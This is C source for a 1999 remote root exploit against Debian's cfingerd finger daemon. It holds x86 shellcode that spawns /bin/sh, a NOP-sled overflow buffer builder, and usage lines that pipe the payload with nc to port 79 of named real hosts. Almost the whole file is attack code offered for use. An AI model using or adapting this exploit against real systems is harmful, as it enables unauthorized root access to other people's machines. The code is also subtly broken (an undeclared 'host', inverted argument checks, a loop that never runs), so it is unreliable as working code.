home *** CD-ROM | disk | FTP | other *** search
- /*
- - Imperfection Security Presents -
-
- Debian GNU/Linux cfingerd remote root exploit
- From shakey, of Imperfection Security [07/99]
-
- Exploits a problem reported on BUGTRAQ in Debian's
- cfingerd. This exploit is remotely exploitable, and
- leaves the attacker a root shell on vulnerable systems.
- However, this attack is less susceptible to mass-probing
- from script kiddies due to the lack of a banner from the
- finger service ;D
-
- Affected Systems:
- + Debian Linux 2.0r5, 2.0, 1.3.1, 1.3, 1.2
-
- Greetings: dave, unknown, syntax, naptime, jaz, blitzed
- t0m, insane, DSC, short, vicci, crime, SDI
- ( nice shellcode generator ), phewl,
- phenom, punish, kindred, tom-, justin
-
- Usage:
- IS-finger [offset]
- Example: (./IS-finger 0; cat) | nc linux.org 79
- */
-
- #include <stdio.h>
-
- char shellcode[] =
- "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
- "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
- "\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
- "\xff\xff/bin/sh"
-
- main (int argc, char *argv[]) {
- char buf[2500];
- int x,y=1000, offset=0;
- long addr;
- int bsize=986;
-
- if ( argc > 1) {
- printf ( "Imperfection Securities\' cfingerd exploit.");
- printf ( "Usage: (./IS-finger [offset]; cat) | nc debian.org 79\n");
- exit (0);
- }
-
- if ( argc > 0) offset = atoi (argv[1]);
-
- addr = 0xbffff3c0 + offset;
-
- bsize -= strlen ( host);
-
- for ( x = 0; x < bsize-strlen(shellcode); x++)
- buf[x] = 0x90;
-
- for ( y = 0; y < strlen(shellcode); x++, y++)
- buf[x] = shellcode[y];
-
- for ( ; x < 72; x+=4) {
- buf[x ] = addr & 0x000000ff;
- buf[x+1] = (addr & 0x0000ff00) >> 8;
- buf[x+2] = (addr & 0x00ff0000) >> 16;
- buf[x+3] = (addr & 0xff000000) >> 24;
- }
-
- sleep (1);
- printf ( "%s\r\n", buf);
- }
-
-
